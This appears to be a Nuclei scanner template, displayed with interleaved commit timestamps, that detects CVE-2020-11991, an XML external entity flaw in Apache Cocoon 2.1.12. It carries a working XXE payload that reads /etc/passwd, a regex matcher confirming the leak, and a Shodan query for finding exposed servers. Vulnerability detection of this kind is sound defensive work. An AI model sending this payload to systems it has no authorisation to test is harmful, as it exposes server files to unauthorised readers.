2021-02-13 07:17:02 +00:00
id : CVE-2020-11991
info :
2022-11-29 05:33:38 +00:00
name : Apache Cocoon 2.1.12 - XML Injection
2021-02-13 07:17:02 +00:00
author : pikpikcu
severity : high
2022-05-17 09:18:12 +00:00
description : Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
2022-04-07 13:53:15 +00:00
reference :
- https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b
- https://nvd.nist.gov/vuln/detail/CVE-2020-11991
2022-05-17 09:18:12 +00:00
- https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E
remediation : Upgrade to Apache Cocoon 2.1.13 or later.
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-11991
cwe-id : CWE-611
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:*
epss-score : 0.91129
2022-05-12 14:18:36 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-05-12 14:18:36 +00:00
shodan-query : http.html:"Apache Cocoon"
2022-04-07 13:53:15 +00:00
tags : cve,cve2020,apache,xml,cocoon,xxe
2021-02-13 07:17:02 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-02-13 07:17:02 +00:00
- method : POST
path :
- "{{BaseURL}}/v2/api/product/manger/getInfo"
headers :
2021-08-19 14:25:01 +00:00
Content-Type : "text/xml"
2021-02-13 07:17:02 +00:00
body : |
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
2021-02-13 08:02:07 +00:00
<firstName>John</firstName>
2021-02-13 07:17:02 +00:00
<lastName>&ent;</lastName>
</userInfo>
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-02-13 07:49:37 +00:00
2021-02-13 07:17:02 +00:00
- type : status
status :
- 200
2022-02-25 22:07:55 +00:00
2022-04-07 13:53:15 +00:00
# Enhanced by mp on 2022/04/05